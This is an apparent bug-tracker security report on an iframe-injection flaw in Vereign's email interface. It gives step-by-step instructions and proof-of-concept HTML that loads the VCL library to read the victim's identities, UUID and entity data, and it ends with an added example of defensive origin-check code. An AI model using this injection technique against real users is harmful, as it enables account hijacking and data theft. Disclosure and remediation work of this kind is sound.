Intruder can access the user data and work from the user account
related to: #28 (closed)
Access to user data and work/act like it was a user
Note: We need to agree where to fix the issue, because we don't control how we are sending the email (when we speak about RoundCube).
- For this below you don't need to prepare a fake message... It can be signed with your account, but you can put the iframe there, too.
- The same technique applies if we put any link to an external resource: we can track user IPs and so on via this approach.
I injected this page via iframe.
A way to inject: https://code.vereign.com/code/vcl/issues/28#note_25235 (4th point in a ticket)
1) Prepare a fake email message, set the user email ("To" section), change the message id
2) Paste <iframe src="http://localhost:8000"></iframe> to the email body
3) Change http://localhost:8000 to the URL where this script will be hosted
It should be HTTPS if the user works on HTTPS
4) Send an email
5) Wait until the user opens this email in the Vereign interface
Comments:
I do not have access to the user's localStorage, but I can work with the VCL library, which has access.
Change https://alexeylunin.dev.vereign.com below to the URL the user is working on
So, now I can work from this injected script as a user
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Title</title>
</head>
<body>
  <script src="https://alexeylunin.dev.vereign.com/vcl/js/client"></script>
  <script>
    console.log("Injected: setupViamAPI");
    window.setupViamAPI(
      "hackDiv",
      {
        onEvent: () => {}
      },
      "https://alexeylunin.dev.vereign.com/vcl/js/iframe",
      "https://alexeylunin.dev.vereign.com/api/",
      "https://alexeylunin.dev.vereign.com/wopi/",
      "https://alexeylunin.dev.vereign.com"
    ).then(async function(lib) {
      window.lib = lib;
      console.log("Injected: Lib is initialized");
      var identities = await lib.listIdentities();
      console.log("Injected: User identities: ", identities);
      var currentUUID = await lib.getCurrentlyLoggedInUUID();
      console.log("Injected: Current UUID: ", currentUUID.data);
      var entity = await lib.entityGetEntity(currentUUID.data);
      console.log("Injected: Current entity: ", entity);
      console.log("Injected: Also I can send data to somewhere");
    });
  </script>
  <div id="hackDiv"></div>
</body>
</html>
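One place the fix could live, shown as an added example that is not part of the original report and is not Vereign's code: the library iframe refuses to be embedded by, or to serve, any origin that is not allow-listed, so a page loaded from an email body cannot drive it. It assumes the iframe talks to its embedder over `postMessage`; `TRUSTED_ORIGINS`, `handleRequest` and the `app.example.test` origin are hypothetical.

```javascript
// Added example: origin gate for a library iframe that holds user credentials.
// TRUSTED_ORIGINS and handleRequest are hypothetical names, and the postMessage
// transport is an assumption; none of this is the VCL library's real API.
const TRUSTED_ORIGINS = new Set(["https://app.example.test"]); // constructed value

// Compare the full, normalized origin exactly; never use prefix or substring checks.
function isTrustedOrigin(origin, trusted = TRUSTED_ORIGINS) {
  // "null" is the opaque origin of sandboxed frames and data: URLs.
  if (typeof origin !== "string" || origin === "null") return false;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return false; // not a parseable origin
  }
  return parsed.origin === origin && trusted.has(parsed.origin);
}

// Content-Security-Policy value for the iframe endpoint: the browser checks
// every ancestor frame, so an untrusted page in the chain blocks the load.
function frameAncestorsHeader(trusted = TRUSTED_ORIGINS) {
  return "frame-ancestors " + [...trusted].join(" ");
}

// Message handler for the iframe: drop requests whose sender is not allow-listed.
function makeMessageHandler(handleRequest, trusted = TRUSTED_ORIGINS) {
  return function onMessage(event) {
    if (!isTrustedOrigin(event.origin, trusted)) {
      return { handled: false, reason: "untrusted origin: " + event.origin };
    }
    return { handled: true, result: handleRequest(event.data) };
  };
}

// In the browser: window.addEventListener("message", makeMessageHandler(dispatch));
```

Stripping or sandboxing `iframe` elements when the mail body is rendered is a complementary control for the external-resource tracking mentioned in the note above.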